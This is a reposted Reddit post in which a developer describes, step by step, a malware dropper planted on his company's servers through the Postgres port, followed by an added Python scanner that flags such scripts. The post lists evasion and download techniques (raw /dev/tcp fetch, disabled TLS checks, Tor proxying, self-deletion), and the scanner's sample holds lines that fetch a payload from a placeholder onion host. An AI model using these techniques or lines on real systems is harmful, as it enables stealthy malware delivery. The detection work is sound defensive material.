We got a cyber attack
Summary: The company suffered a cyber attack in which the attacker planted a malicious script through the Postgres database port that downloads and executes malware. The script is cleverly designed, but in the end the binary could not be analysed. 2026-1-27 12:48:38 Author: www.reddit.com (view original) Views: 7

Hi, I hope everything is going great. I'm writing this for people who are curious and want to know more about how we got a cyber attack.

Recently we got an attack on almost all of our servers. Since I'm not in the network/security team I don't know many details about how they got in; the only thing I know is that they used port 5432, which is for the Postgres database. Somehow they got in and executed a query command that creates a file and implants a malware script (again, I don't know too much about how they did it). The surprising thing is that all our networks are local; we are blocking everything with iptables except our company's IPs.

Anyway, let's go to the good stuff...

A friend of mine in the network team sent me the script that got installed on one of the servers (I begged him for the script); it's a shell-based script.
Since I'm a programmer... I couldn't stop myself from analysing it and seeing what it does,
and I found that this script is so damn charming; I like how the script is made and how it thought about every single piece.

I don't know if the script was written by hand or if he used an obfuscator tool (as we call it in our world; I'm a dev btw). Everything was written with gibberish names, but I didn't really care tbh. The script was simple and direct, but smart. I knew it was not made by AI or by someone who is good at programming, because he made some structure/duplication mistakes, but it was genius how the script works!

The goal of the script is simply to download the true malware and execute it!
The way he does it is fascinating *(at least for me)*.

I will give an overview of how the script works (for the people who are too lazy to read the script; otherwise I would provide the script, but I would comment the whole content).

PS: please be careful, I still don't know what the malware does, so don't execute it!

So the script starts by:

  • redirecting all the output to /dev/null to eliminate any output

  • checking if the script is already running in /proc; if not, it will relaunch

  • checking if the path /tmp/.ICE-unix exists, otherwise it recreates it; apparently this is a known folder that exists on most Linux servers, and why in /tmp/? I think because the system deletes its contents after a period of time

  • reordering the PATH variable, where he adds multiple paths like /usr/bin, /usr/local/bin, /tmp, the current path and also /tmp/.ICE-unix (so that he can execute the script wherever the path is, I guess, not sure really)

  • looping through that list of paths he added to the PATH variable, creating a file called i and giving it execution permission (I didn't know why he did it, but maybe because he is making sure that those paths are executable or something, not sure)

  • checking if curl exists and works, otherwise he makes an alternative (he will need such a tool to download the malware, and for the alternative he is making a raw TCP connection using /dev/tcp/host/port to download curl from his server)

  • finally the fun part (downloading the malware): he tries 4 different methods to download the malware (for the sake of making the post shorter I will talk only about one method)

  • he bypasses the server DNS, TLS checks, sender fingerprint, ANND he connected to a Tor server via a SOCKS5 proxy, all in one command... (scary and fascinating)

  • finally he executes the script and removes it!

My curiosity pushed me a bit further, and I updated the script a bit so I could download the malware without executing it and see what it is about.

I extracted the URL and downloaded the malware, hoping it's a shell script too or something similar. I made sure that I removed the execution permission from it *(I was so scared to mess something up because, again, I know nothing about this; I only know how to program... stuff).*

The moment of truth has come; I tried to read it to see its content, anddd.... fuck! Binary code... the bastard compiled the code. I mean, yeah, expectable, and that's when I thought, hmm, why didn't he also compile the script that downloads the malware too, why only the malware?!

I tried to use some online decompilers but no chance; I only get some gibberish content. All this happened yesterday and I'm writing this the day after the incident.
Anyway, this is my story and here is the script. Please, this is only for educational purposes and to seek any information from you guys; I have so many questions actually, please correct anything I said....
THE SCRIPT!:

I can't put the script here (because of Reddit's filters, but yeah, DM for the script)
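As an added defensive example (this is not part of the Reddit post and not the script the poster describes), the following Python snippet turns the behaviours listed in the overview above into a small static indicator scanner: output silenced to /dev/null, use of /tmp/.ICE-unix, PATH prepended with temp directories, raw /dev/tcp downloads, TLS verification disabled, SOCKS5/Tor usage and self-deletion. The two sample scripts, the weights and the verdict thresholds are constructed for this example; the hostnames are placeholders, and the suspicious sample is a set of indicator lines, not a working dropper.

```python
"""Static indicator scan for shell scripts shaped like the dropper in the post.

Added example; indicators, weights, thresholds and samples are assumptions.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Indicator:
    name: str
    pattern: re.Pattern
    weight: int


# One indicator per behaviour from the post's overview (weights are assumptions).
INDICATORS = [
    Indicator("silence_output",
              re.compile(r">\s*/dev/null\s+2>&1|exec\s+>\s*/dev/null"), 1),
    Indicator("hidden_tmp_dir", re.compile(r"/tmp/\.ICE-unix"), 2),
    Indicator("path_prepend_tmp", re.compile(r"PATH=[^\n]*(/tmp|\.ICE-unix)"), 2),
    Indicator("chmod_exec", re.compile(r"chmod\s+\+?x"), 1),
    Indicator("raw_tcp_download", re.compile(r"/dev/tcp/"), 3),
    Indicator("tls_verify_disabled", re.compile(r"(^|\s)(-k|--insecure)(\s|$)"), 2),
    Indicator("socks5_proxy", re.compile(r"--socks5(-hostname)?|socks5h?://"), 2),
    Indicator("tor_port_or_onion", re.compile(r":9050\b|\.onion\b"), 2),
    Indicator("self_delete", re.compile(r"rm\s+(-f\s+)?(\"?\$0\"?|\$\{0\})"), 2),
]


def scan(script_text: str) -> dict:
    """Return the indicators found (each counted once), a score and a verdict."""
    hits = [ind.name for ind in INDICATORS if ind.pattern.search(script_text)]
    score = sum(ind.weight for ind in INDICATORS if ind.name in hits)
    return {"hits": hits, "score": score, "verdict": verdict(score)}


def verdict(score: int) -> str:
    """Thresholds are an assumption; tune them against your own scripts."""
    if score >= 6:
        return "likely dropper"
    if score >= 3:
        return "suspicious"
    return "clean"


# Constructed benign sample: a nightly backup job that also silences output.
BENIGN = """#!/bin/sh
tar czf /var/backups/db-$(date +%F).tgz /var/lib/postgresql >/dev/null 2>&1
curl -sS https://updates.example.internal/status -o /tmp/status.json
"""

# Constructed suspicious sample: indicator lines only, hosts are placeholders.
SUSPICIOUS = """#!/bin/sh
exec >/dev/null 2>&1
mkdir -p /tmp/.ICE-unix
export PATH=/tmp/.ICE-unix:/tmp:/usr/local/bin:/usr/bin:$PATH
exec 3<>/dev/tcp/PLACEHOLDER_HOST/80
curl -k --socks5-hostname 127.0.0.1:9050 http://PLACEHOLDER.onion/x -o /tmp/.ICE-unix/x
rm -f "$0"
"""


if __name__ == "__main__":
    for label, text in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(label, scan(text))
```

Run it on real scripts by feeding file contents to `scan()`; a single hit such as `silence_output` is normal in cron jobs, which is why the weights matter more than any one match.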

Source: https://www.reddit.com/r/HowToHack/comments/1qocxd9/we_got_a_cyber_attack/